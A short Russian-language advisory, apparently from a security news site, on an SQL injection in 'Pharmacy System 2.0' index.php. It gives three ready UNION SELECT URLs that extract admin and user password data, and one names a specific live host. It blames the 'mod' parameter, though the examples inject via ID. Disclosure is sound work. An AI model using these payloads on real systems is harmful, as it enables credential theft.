Программа: Pharmacy System 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mod» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1& action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3, concat(username,password),5,6,7,8,9,10,11%20FROM %20pharma1_admin_users

http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1& action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3, concat(username,password),5,6,7,8,9,10,11%20FROM %20pharma1_users

http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1& action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3, concat(username,password),5,6,7,8,9,10,11%20 FROM%20pharma1_admin_users



Оставить мнение